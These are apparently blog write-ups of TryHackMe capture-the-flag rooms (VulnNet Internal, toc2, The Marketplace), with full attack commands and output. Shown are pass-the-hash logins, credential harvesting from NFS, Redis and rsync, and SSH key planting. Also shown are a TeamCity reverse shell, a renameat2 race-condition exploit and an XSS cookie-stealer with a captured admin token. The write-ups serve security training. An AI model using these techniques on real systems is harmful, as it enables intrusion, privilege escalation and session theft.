┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ evil-winrm -i 10.10.100.15 -u administrator -H "c2597747aa5e43022a3a3049a3c3b09d"                           1 ⨯

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        3/13/2021   3:34 PM             39 system.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat system.txt
THM{16f45e3934293a57645f8d7bf71d8d4c}

System flag: THM{16f45e3934293a57645f8d7bf71d8d4c}

TryHackMe > VulnNet Internal

Thu, 27 May 2021 11:48:00 +0000

VulnNet Entertainment learns from its mistakes, and now they have something new for you…

VulnNet Entertainment is a company that learns from its mistakes. They quickly realized that they can’t make a properly secured web application so they gave up on that idea. Instead, they decided to set up internal services for business purposes. As usual, you’re tasked to perform a penetration test of their network and report your findings.

Difficulty: Easy/Medium
Operating System: Linux

This machine was designed to be quite the opposite of the previous machines in this series and it focuses on internal services. It’s supposed to show you how you can retrieve interesting information and use it to gain system access. Report your findings by submitting the correct flags.

Note: It might take 3-5 minutes for all the services to boot.

Author: TheCyb3rW0lf
Discord: TheCyb3rW0lf#8594

Icon made by Freepik from www.flaticon.com

What is the services flag? (services.txt)

Hint: It’s stored inside one of the available services.

Nmap scan

Nmap reveals several open ports:

PORT      STATE    SERVICE     VERSION
22/tcp    open     ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA)
|   256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA)
|_  256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519)
111/tcp   open     rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      35973/tcp   mountd
|   100005  1,2,3      50743/udp   mountd
|   100005  1,2,3      50821/tcp6  mountd
|   100005  1,2,3      60228/udp6  mountd
|   100021  1,3,4      33804/udp6  nlockmgr
|   100021  1,3,4      35968/udp   nlockmgr
|   100021  1,3,4      38965/tcp6  nlockmgr
|   100021  1,3,4      44305/tcp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
139/tcp   open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open     netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
873/tcp   open     rsync       (protocol version 31)
2049/tcp  open     nfs_acl     3 (RPC #100227)
6379/tcp  open     redis       Redis key-value store
9090/tcp  filtered zeus-admin
35973/tcp open     mountd      1-3 (RPC #100005)
39613/tcp open     mountd      1-3 (RPC #100005)
42041/tcp open     java-rmi    Java RMI
44305/tcp open     nlockmgr    1-4 (RPC #100021)
49833/tcp open     mountd      1-3 (RPC #100005)
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -39m59s, deviation: 1h09m16s, median: 0s
|_nbstat: NetBIOS name: VULNNET-INTERNA, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: vulnnet-internal
|   NetBIOS computer name: VULNNET-INTERNAL\x00
|   Domain name: \x00
|   FQDN: vulnnet-internal
|_  System time: 2021-05-26T20:17:39+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-05-26T18:17:39
|_  start_date: N/A

Samba

Listing the Samba shares reveals a shares network share:

┌──(kali㉿kali)-[/data/VulnNet_Internal]
└─$ smbclient -L 10.10.190.83                              
Enter WORKGROUP\kali's password: 

    Sharename       Type      Comment
    ---------       ----      -------
    print$          Disk      Printer Drivers
    shares          Disk      VulnNet Business Shares
    IPC$            IPC       IPC Service (vulnnet-internal server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

We can access it without authentication, and read the content of the services.txt file which contains the flag:

┌──(kali㉿kali)-[/data/VulnNet_Internal]
└─$ smbclient //10.10.190.83/shares
Enter WORKGROUP\kali's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Feb  2 10:20:09 2021
  ..                                  D        0  Tue Feb  2 10:28:11 2021
  temp                                D        0  Sat Feb  6 12:45:10 2021
  data                                D        0  Tue Feb  2 10:27:33 2021

        11309648 blocks of size 1024. 3275768 blocks available
smb: \> cd temp
smb: \temp\> ls
  .                                   D        0  Sat Feb  6 12:45:10 2021
  ..                                  D        0  Tue Feb  2 10:20:09 2021
  services.txt                        N       38  Sat Feb  6 12:45:09 2021

        11309648 blocks of size 1024. 3275768 blocks available
smb: \temp\> get services.txt -
THM{0a09d51e488f5fa105d8d866a497440a}
getting file \temp\services.txt of size 38 as - (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)

Services flag: THM{0a09d51e488f5fa105d8d866a497440a}

What is the internal flag? (“internal flag”)

Hint: It’s stored inside a database of one of the services.

NFS

The Nmap scan revealed a NFS share. We can connect without authentication:

┌──(kali㉿kali)-[/data/VulnNet_Internal/files]
└─$ mkdir tmp/

┌──(kali㉿kali)-[/data/VulnNet_Internal/files]
└─$ sudo mount -t nfs 10.10.190.83: tmp     
                                                                                                                     
┌──(kali㉿kali)-[/data/VulnNet_Internal/files]
└─$ tree tmp             
tmp
└── opt
    └── conf
        ├── hp
        │   └── hplip.conf
        ├── init
        │   ├── anacron.conf
        │   ├── lightdm.conf
        │   └── whoopsie.conf
        ├── opt
        ├── profile.d
        │   ├── bash_completion.sh
        │   ├── cedilla-portuguese.sh
        │   ├── input-method-config.sh
        │   └── vte-2.91.sh
        ├── redis
        │   └── redis.conf
        ├── vim
        │   ├── vimrc
        │   └── vimrc.tiny
        └── wildmidi
            └── wildmidi.cfg

There is an interesting redis.conf configuration file. It contains the password to the Redis server:

┌──(kali㉿kali)-[/data/…/files/opt/conf/redis]
└─$ grep -Ev "^#|^$" redis.conf
rename-command FLUSHDB ""
rename-command FLUSHALL ""
bind 127.0.0.1 ::1
protected-mode yes
port 6379
tcp-backlog 511
timeout 0
tcp-keepalive 300
daemonize yes
supervised no
pidfile /var/run/redis/redis-server.pid
loglevel notice
logfile /var/log/redis/redis-server.log
databases 16
always-show-logo yes
save 900 1
save 300 10
save 60 10000
stop-writes-on-bgsave-error yes
rdbcompression yes
rdbchecksum yes
dbfilename dump.rdb
dir /var/lib/redis
slave-serve-stale-data yes
requirepass "B65Hx562F@ggAZ@F" <-------------------- password
slave-read-only yes
repl-diskless-sync no
repl-diskless-sync-delay 5
repl-disable-tcp-nodelay no
slave-priority 100
lazyfree-lazy-eviction no
lazyfree-lazy-expire no
lazyfree-lazy-server-del no
slave-lazy-flush no
appendonly no
appendfilename "appendonly.aof"
appendfsync everysec
no-appendfsync-on-rewrite no
auto-aof-rewrite-percentage 100
auto-aof-rewrite-min-size 64mb
aof-load-truncated yes
aof-use-rdb-preamble no
lua-time-limit 5000
slowlog-log-slower-than 10000
slowlog-max-len 128
latency-monitor-threshold 0
notify-keyspace-events ""
hash-max-ziplist-entries 512
hash-max-ziplist-value 64
list-max-ziplist-size -2
list-compress-depth 0
set-max-intset-entries 512
zset-max-ziplist-entries 128
zset-max-ziplist-value 64
hll-sparse-max-bytes 3000
activerehashing yes
client-output-buffer-limit normal 0 0 0
client-output-buffer-limit slave 256mb 64mb 60
client-output-buffer-limit pubsub 32mb 8mb 60
hz 10
aof-rewrite-incremental-fsync yes

Redis

Let’s connect to the Redis server using the password found just above:

┌──(kali㉿kali)-[/data/…/files/opt/conf/redis]
└─$ redis-cli -h 10.10.190.83 -a "B65Hx562F@ggAZ@F"
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.190.83:6379> ping
PONG

We can list the KEYS. The internal flag is found under the internal flag key:

10.10.190.83:6379> KEYS *
1) "tmp"
2) "marketlist"
3) "authlist"
4) "internal flag"
5) "int"
10.10.190.83:6379> 
10.10.190.83:6379> KEYS "internal flag"
1) "internal flag"
10.10.190.83:6379> GET "internal flag"
"THM{ff8e518addbbddb74531a724236a8221}"

Internal flag: THM{ff8e518addbbddb74531a724236a8221}

What is the user flag? (user.txt)

Redis

Still connected to the Redis server, we find a base64 encoded string under the authlist object:

┌──(kali㉿kali)-[/data/VulnNet_Internal/files]
└─$ redis-cli -h 10.10.190.83 -a "B65Hx562F@ggAZ@F"                       
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.190.83:6379> KEYS *
1) "internal flag"
2) "authlist"
3) "marketlist"
4) "int"
5) "tmp"
10.10.190.83:6379> GET authlist
(error) WRONGTYPE Operation against a key holding the wrong kind of value
10.10.190.83:6379> LRANGE authlist 1 100
1) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
2) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
3) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
10.10.190.83:6379>

The encoded string revals the rsync connection string as well as the password:

┌──(kali㉿kali)-[/data/VulnNet_Internal/files]
└─$ echo "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==" | base64 -d
Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v

rsync

Connecting to the rsync server reveals a files directory:

┌──(kali㉿kali)-[/data/VulnNet_Internal/files]
└─$ rsync --list-only rsync://10.10.190.83                                                                     23 ⨯
files           Necessary home interaction

There is a subfolder called sys-internal which contains the user flag.

┌──(kali㉿kali)-[/data/VulnNet_Internal/files]
└─$ rsync --list-only rsync://rsync-connect@10.10.190.83/files
Password: Hcg3HP67@TW@Bc72v
drwxr-xr-x          4,096 2021/02/01 13:51:14 .
drwxr-xr-x          4,096 2021/02/06 13:49:29 sys-internal

┌──(kali㉿kali)-[/data/VulnNet_Internal/files]
└─$ rsync --list-only rsync://rsync-connect@10.10.190.83/files/sys-internal/
Password: 
drwxr-xr-x          4,096 2021/02/06 13:49:29 .
-rw-------             61 2021/02/06 13:49:28 .Xauthority
lrwxrwxrwx              9 2021/02/01 14:33:19 .bash_history
-rw-r--r--            220 2021/02/01 13:51:14 .bash_logout
-rw-r--r--          3,771 2021/02/01 13:51:14 .bashrc
-rw-r--r--             26 2021/02/01 13:53:18 .dmrc
-rw-r--r--            807 2021/02/01 13:51:14 .profile
lrwxrwxrwx              9 2021/02/02 15:12:29 .rediscli_history
-rw-r--r--              0 2021/02/01 13:54:03 .sudo_as_admin_successful
-rw-r--r--             14 2018/02/12 20:09:01 .xscreensaver
-rw-------          2,546 2021/02/06 13:49:35 .xsession-errors
-rw-------          2,546 2021/02/06 12:40:13 .xsession-errors.old
-rw-------             38 2021/02/06 12:54:25 user.txt
drwxrwxr-x          4,096 2021/02/02 10:23:00 .cache
drwxrwxr-x          4,096 2021/02/01 13:53:57 .config
drwx------          4,096 2021/02/01 13:53:19 .dbus
drwx------          4,096 2021/02/01 13:53:18 .gnupg
drwxrwxr-x          4,096 2021/02/01 13:53:22 .local
drwx------          4,096 2021/02/01 14:37:15 .mozilla
drwxrwxr-x          4,096 2021/02/06 12:43:14 .ssh
drwx------          4,096 2021/02/02 12:16:16 .thumbnails
drwx------          4,096 2021/02/01 13:53:21 Desktop
drwxr-xr-x          4,096 2021/02/01 13:53:22 Documents
drwxr-xr-x          4,096 2021/02/01 14:46:46 Downloads
drwxr-xr-x          4,096 2021/02/01 13:53:22 Music
drwxr-xr-x          4,096 2021/02/01 13:53:22 Pictures
drwxr-xr-x          4,096 2021/02/01 13:53:22 Public
drwxr-xr-x          4,096 2021/02/01 13:53:22 Templates
drwxr-xr-x          4,096 2021/02/01 13:53:22 Videos

Let’s sync our SSH public key:

┌──(kali㉿kali)-[/data/VulnNet_Internal/files]
└─$ cp ~/.ssh/id_rsa.pub authorized_keys

┌──(kali㉿kali)-[/data/VulnNet_Internal/files]
└─$ rsync authorized_keys rsync://rsync-connect@10.10.190.83/files/sys-internal/.ssh                            3 ⨯
Password:

SSH connection / user flag

We can now connect through SSH and get the user flag:

┌──(kali㉿kali)-[/data/VulnNet_Internal/files]
└─$ ssh sys-internal@10.10.190.83        
sys-internal@vulnnet-internal:~$ cat user.txt 
THM{da7c20696831f253e0afaca8b83c07ab}

What is the root flag? (root.txt)

There is an interesting TeamCity directory at the root of the file system:

sys-internal@vulnnet-internal:/$ ls -la /
total 533824
drwxr-xr-x  24 root root      4096 Feb  6 12:58 ./
drwxr-xr-x  24 root root      4096 Feb  6 12:58 ../
drwxr-xr-x   2 root root      4096 Feb  2 14:05 bin/
drwxr-xr-x   3 root root      4096 Feb  1 14:02 boot/
drwx------   2 root root      4096 Feb  1 13:41 .cache/
drwxr-xr-x  17 root root      3720 May 27 07:34 dev/
drwxr-xr-x 129 root root     12288 Feb  7 19:21 etc/
drwxr-xr-x   3 root root      4096 Feb  1 13:51 home/
lrwxrwxrwx   1 root root        34 Feb  1 14:01 initrd.img -> boot/initrd.img-4.15.0-135-generic
lrwxrwxrwx   1 root root        33 Feb  1 13:30 initrd.img.old -> boot/initrd.img-4.15.0-20-generic
drwxr-xr-x  18 root root      4096 Feb  1 13:43 lib/
drwxr-xr-x   2 root root      4096 Feb  1 13:28 lib64/
drwx------   2 root root     16384 Feb  1 13:27 lost+found/
drwxr-xr-x   4 root root      4096 Feb  2 10:49 media/
drwxr-xr-x   2 root root      4096 Feb  1 13:27 mnt/
drwxr-xr-x   4 root root      4096 Feb  2 10:28 opt/
dr-xr-xr-x 136 root root         0 May 27 07:33 proc/
drwx------   8 root root      4096 Feb  6 13:32 root/
drwxr-xr-x  27 root root       880 May 27 08:37 run/
drwxr-xr-x   2 root root      4096 Feb  2 14:06 sbin/
drwxr-xr-x   2 root root      4096 Feb  1 13:27 srv/
-rw-------   1 root root 546529280 Feb  1 13:27 swapfile
dr-xr-xr-x  13 root root         0 May 27 08:39 sys/
drwxr-xr-x  12 root root      4096 Feb  6 13:30 TeamCity/ <----------------------- interesting
drwxrwxrwt  11 root root      4096 May 27 08:40 tmp/
drwxr-xr-x  10 root root      4096 Feb  1 13:27 usr/
drwxr-xr-x  13 root root      4096 Feb  1 13:43 var/
lrwxrwxrwx   1 root root        31 Feb  1 14:01 vmlinuz -> boot/vmlinuz-4.15.0-135-generic
lrwxrwxrwx   1 root root        30 Feb  1 13:30 vmlinuz.old -> boot/vmlinuz-4.15.0-20-generic

Checking the network sockets reveals that a service is running for localhost on port 8111, which is likely used by TeamCity.

sys-internal@vulnnet-internal:~$ ss -ltp
State       Recv-Q       Send-Q                    Local Address:Port                       Peer Address:Port       
LISTEN      0            50                              0.0.0.0:microsoft-ds                    0.0.0.0:*          
LISTEN      0            128                             0.0.0.0:39391                           0.0.0.0:*          
LISTEN      0            64                              0.0.0.0:nfs                             0.0.0.0:*          
LISTEN      0            128                             0.0.0.0:33735                           0.0.0.0:*          
LISTEN      0            5                               0.0.0.0:rsync                           0.0.0.0:*          
LISTEN      0            50                              0.0.0.0:netbios-ssn                     0.0.0.0:*          
LISTEN      0            128                             0.0.0.0:6379                            0.0.0.0:*          
LISTEN      0            128                             0.0.0.0:sunrpc                          0.0.0.0:*          
LISTEN      0            64                              0.0.0.0:34769                           0.0.0.0:*          
LISTEN      0            128                       127.0.0.53%lo:domain                          0.0.0.0:*          
LISTEN      0            128                             0.0.0.0:ssh                             0.0.0.0:*          
LISTEN      0            5                             127.0.0.1:ipp                             0.0.0.0:*          
LISTEN      0            128                             0.0.0.0:33145                           0.0.0.0:*          
LISTEN      0            50                   [::ffff:127.0.0.1]:57882                                 *:*          
LISTEN      0            50                                 [::]:microsoft-ds                       [::]:*          
LISTEN      0            64                                 [::]:nfs                                [::]:*          
LISTEN      0            50                                    *:9090                                  *:*          
LISTEN      0            1                    [::ffff:127.0.0.1]:8105                                  *:*          
LISTEN      0            5                                  [::]:rsync                              [::]:*          
LISTEN      0            128                               [::1]:6379                               [::]:*          
LISTEN      0            50                                 [::]:netbios-ssn                        [::]:*          
LISTEN      0            100                  [::ffff:127.0.0.1]:8111                                  *:*  <------------ TeamCity running on localhost on port 8111        
LISTEN      0            128                                [::]:sunrpc                             [::]:*          
LISTEN      0            64                                 [::]:33363                              [::]:*          
LISTEN      0            128                                [::]:40659                              [::]:*          
LISTEN      0            128                                [::]:ssh                                [::]:*          
LISTEN      0            50                                    *:35095                                 *:*          
LISTEN      0            128                                [::]:38359                              [::]:*          
LISTEN      0            5                                 [::1]:ipp                                [::]:*          
LISTEN      0            128                                [::]:46425                              [::]:*

Let’s use SSH port forwarding to connect to this port:

$ ssh -L 8111:127.0.0.1:8111 sys-internal@10.10.190.83

TeamCity

Now when we connect to http://localhost:8111, we can see the TeamCity login page:

There is a link to connect as super user:

No System Administrator found. 
Log in as a Super user to create an administrator account.

It requires a token. Searching for the token string in the logs directory reveals several tokens:

sys-internal@vulnnet-internal:/TeamCity$ grep -iR token /TeamCity/logs/ 2>/dev/null
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 8446629153054945175 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 3782562599667957776 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 4174796436262174108 (use empty username with the token as the password to access the server)
/TeamCity/logs/catalina.out:[TeamCity] Super user authentication token: 4174796436262174108 (use empty username with the token as the password to access the server)

Using the last token, we can connect as super admin.

Running commands on TeamCity

TeamCity is run by root on the target, which means that executing a reverse shell will grant us root access. After googling how to run commands on TeamCity, I found that it can be done via build steps in a project.

Create a project and go to build steps. Select “Command line” as “Runner type”, and put a python3 reverse shell string as the script command:

Now, start a listener (nc -nlvp 4444) and click on the run button to run the command.

We now have a root shell:

┌──(kali㉿kali)-[/data/VulnNet_Internal/files]
└─$ nc -nlvp 4444    
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.190.83] 48482
bash: cannot set terminal process group (481): Inappropriate ioctl for device
bash: no job control in this shell
root@vulnnet-internal:/TeamCity/buildAgent/work/2b35ac7e0452d98f# cat /root/root.txt

Root flag: THM{e8996faea46df09dba5676dd271c60bd}

TryHackMe > toc2

Wed, 26 May 2021 07:00:00 +0000

It’s a setup... Can you get the flags in time?

I have a theory that the truth is never told during the nine-to-five hours. - Hunter S. Thompson

Find and retrieve the user.txt flag

Services

Nmap reveals 2 open ports:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 84:4e:b1:49:31:22:94:84:83:97:91:72:cb:23:33:36 (RSA)
|   256 cc:32:19:3f:f5:b9:a4:d5:ac:32:0f:6e:f0:83:35:71 (ECDSA)
|_  256 bd:d8:00:be:49:b5:15:af:bf:d5:85:f7:3a:ab:d6:48 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/cmsms/cmsms-2.1.6-install.php
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site Maintenance
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

CMS information

Connecting to the web service’s default page reveals credentials: cmsmsuser:devpass:

┌──(kali㉿kali)-[/data/toc2]
└─$ curl -s http://10.10.215.10/                


Site Maintenance



    Under Construction!
    
        Sorry for the inconvenience but management have once again asked for more than we can deliver. 
        
        The web server isn't going to be ready for the web dev team to build on for another few days. Just in case anyone around here except me wants to do anything: cmsmsuser:devpass 
        — Hunter

Besides, there is also a robots.txt file that discloses the name of a database, as well as a CMS installation URL (CMS Made Simple):

┌──(kali㉿kali)-[/data/toc2]
└─$ curl -s http://10.10.215.10/robots.txt 
User-agent: *
Disallow: /cmsms/cmsms-2.1.6-install.php
 
Note to self:
Tommorow, finish setting up the CMS, and that database, cmsmsdb, so the site's ready by Wednesday.

Running Gobuster won’t reveal other locations. At this stage, here is the information collected so far:

URL: http://10.10.215.10/cmsms/cmsms-2.1.6-install.php
DB: cmsmsdb
Username: cmsmsuser
Password: devpass

CMS Made Simple / Reverse Shell

Let’s proceed with the installation of CMS Made Simple, as we have the setup PHP file.

Complete the installation and login to the admin panel. Then go to the file manager and upload a PHP reverse shell.

Start a listener (nc -nlvp 4444) and browse 10.10.215.10/cmsms/uploads/shell.php.

We now have a reverse shell:

┌──(kali㉿kali)-[/data/toc2/files]
└─$ nc -nlvp 4444       
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.215.10] 34964
Linux toc 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 11:51:53 up 18 min,  0 users,  load average: 1.08, 1.71, 1.47
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

User flag

The user flag is located in frank’s home:

www-data@toc:/home/frank$ cat user.txt 
cat user.txt
thm{63616d70657276616e206c696665}

Escalate your privileges and acquire root.txt

Lateral move (www-data -> frank)

There is a note left in frank’s home folder, disclosing frank’s password: password.

www-data@toc:/home/frank$ cat new_machine.txt
cat new_machine.txt
I'm gonna be switching computer after I get this web server setup done. The inventory team sent me a new Thinkpad, the password is "password". It's funny that the default password for all the work machines is something so simple...Hell I should probably change this one from it, ah well. I'm switching machines soon- it can wait.

Let’s connect as frank:

www-data@toc:/home/frank/root_access$ su frank
su frank
Password: password

frank@toc:~/root_access$ id
id
uid=1000(frank) gid=1000(frank) groups=1000(frank),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd)

The readcreds binary

There is an interesting folder called root_access in frank’s home:

frank@toc:~/root_access$ ll
ll
total 28
drwxr-xr-x 2 frank frank 4096 Jan 31 17:29 ./
drwxr-xr-x 5 frank frank 4096 Aug 18  2020 ../
-rwsr-xr-x 1 root  root  8704 Jan 31 17:29 readcreds*
-rw-r--r-- 1 root  root   656 Jan 31 12:44 readcreds.c
-rw------- 1 root  root    34 Aug 23  2020 root_password_backup

The sources of the readcreds binary are provided:

frank@toc:~/root_access$ cat readcreds.c
#include 
#include 
#include 
#include 
#include 
#include 
#include 

int main(int argc, char* argv[]) {
    int file_data; char buffer[256]; int size = 0;

    if(argc != 2) {
      printf("Binary to output the contents of credentials file \n ./readcreds [file] \n"); 
      exit(1);
    }

    if (!access(argv[1],R_OK)) {
      sleep(1);
      file_data = open(argv[1], O_RDONLY);
    } else {
      fprintf(stderr, "Cannot open %s \n", argv[1]);
      exit(1);
    }

    do {
        size = read(file_data, buffer, 256);
        write(1, buffer, size);
    } 
    
    while(size>0);

}

Race condition

Providing the root_password_backup file to the readcreds binary will show an error, as the file is owned by root. However, we can run a race condition attack.

Download rename.c. The source of the program is shown below:

#define _GNU_SOURCE
#include 
#include 
#include 
#include 
#include 
#include 

// source https://github.com/sroettger/35c3ctf_chals/blob/master/logrotate/exploit/rename.c
int main(int argc, char *argv[]) {
  while (1) {
    syscall(SYS_renameat2, AT_FDCWD, argv[1], AT_FDCWD, argv[2], RENAME_EXCHANGE);
  }
  return 0;
}

Compile the program (gcc rename.c -o rename), create a pwd file and run the rename binary as follows:

frank@toc:~/root_access$ touch pwd
frank@toc:~/root_access$ ./rename pwd root_password_backup

Now in another session:

www-data@toc:/home/frank/root_access$ ./readcreds root_password_backup
./readcreds root_password_backup
Root Credentials:  root:aloevera

Root flag

We can now log in as root and read the root flag:

www-data@toc:/home/frank/root_access$ su - root
su - root
Password: aloevera

root@toc:~# cat /root/root.txt
cat /root/root.txt
thm{7265616c6c696665}

TryHackMe > The Marketplace

Sun, 23 May 2021 09:05:00 +0000

Can you take over The Marketplace’s infrastructure?

The sysadmin of The Marketplace, Michael, has given you access to an internal server of his, so you can pentest the marketplace platform he and his team has been working on. He said it still has a few bugs he and his team need to iron out.

Can you take advantage of this and will you be able to gain root access on his server?

What is flag 1?

Hint: If you think a listing is breaking the rules, you can report it!

Services

An initial Nmap scan reveals that SSH is running on the host on port 22, as well as 2 web services, on port 80 and 32768:

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c8:3c:c5:62:65:eb:7f:5d:92:24:e9:3b:11:b5:23:b9 (RSA)
|   256 06:b7:99:94:0b:09:14:39:e1:7f:bf:c7:5f:99:d3:9f (ECDSA)
|_  256 0a:75:be:a2:60:c6:2b:8a:df:4f:45:71:61:ab:60:b7 (ED25519)
80/tcp    open  http    nginx 1.19.2
| http-robots.txt: 1 disallowed entry 
|_/admin
|_http-server-header: nginx/1.19.2
|_http-title: The Marketplace
32768/tcp open  http    Node.js (Express middleware)
| http-robots.txt: 1 disallowed entry 
|_/admin
|_http-title: The Marketplace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web application

After playing a bit with the web application, there are several things we can do:

sign up (/signup)
sign in (/login)
view listings (/)
view the details a a specific listing (/item/1)
create a new listing (/new)
view messages (/messages)
contact the listing author (/contact/michael)
report a listing to admins (/report/1)

There is also a robots.txt file that reveals an /admin location, but we are not granted access. Running gobuster won’t reveal more resyntaxhighlights.

Interestingly, reporting a listing will generate a first message (the acknowledgment), and then a second message, to simulate an admin action:

Token cookie

Intercepting the requests in BurpSuite will reveal a token cookie:

GET /report/1 HTTP/1.1
Host: 10.10.4.48
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.10.4.48/item/1
Connection: close
Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjQsInVzZXJuYW1lIjoidGVzdCIsImFkbWluIjpmYWxzZSwiaWF0IjoxNjIxNzQ5ODU4fQ.fVUaxWnNiR2427T4FHTeu4ByeBh1pMN5H6nk7onseUY
Upgrade-Insecure-Requests: 1
If-None-Match: W/"314-3YWax+bH+BT3tKkMDiGm21ureFQ"
Cache-Control: max-age=0

Using https://jwt.io/, we can decode the token cookie:

Header:
{
  "alg": "HS256",
  "typ": "JWT"
}

Payload:
{
  "userId": 4,
  "username": "test",
  "admin": false,
  "iat": 1621749858
}

I tried to forge a fake admin token, but it failed to grant me access to the admin interface.

XSS vulnerability

The listing creation form is vulnerable to XSS:

Stealing the admin cookie

We can take advantage of the XSS vulnerability to create a new listing, and report the listing to the admins. Once an admin will review our listing (we have seen previously that there is kind of a cron job that simulates this action), we will be able to steal his session using grabber.php.

Create a new listing and post the following content:

Now, create grabber.php as follows:

$ cat > grabber.php << EOF

$cookie = $_GET['c'];
$fp = fopen('cookies.txt', 'a+');
fwrite($fp, 'Cookie:' .$cookie."\r\n");
fclose($fp);
?>
EOF

Then run a listener (nc -nlvp 8000) and report the listing you’ve created to the admin (e.g. http://10.10.4.48/report/3).

In your listener, you should have a stolen copy of the admin’s cookie:

┌──(kali㉿kali)-[/data/The_Marketplace/files]
└─$ nc -nlvp 8000
listening on [any] 8000 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.4.48] 36374
GET /grabber.php?c=token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOjIsInVzZXJuYW1lIjoibWljaGFlbCIsImFkbWluIjp0cnVlLCJpYXQiOjE2MjE2NzQ1NjN9.SZDjFMO2_KIMpIoLWuD5Zt3fKggTM8AoTS7plL32uig HTTP/1.1
Host: 10.8.50.72:8000
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/85.0.4182.0 Safari/537.36
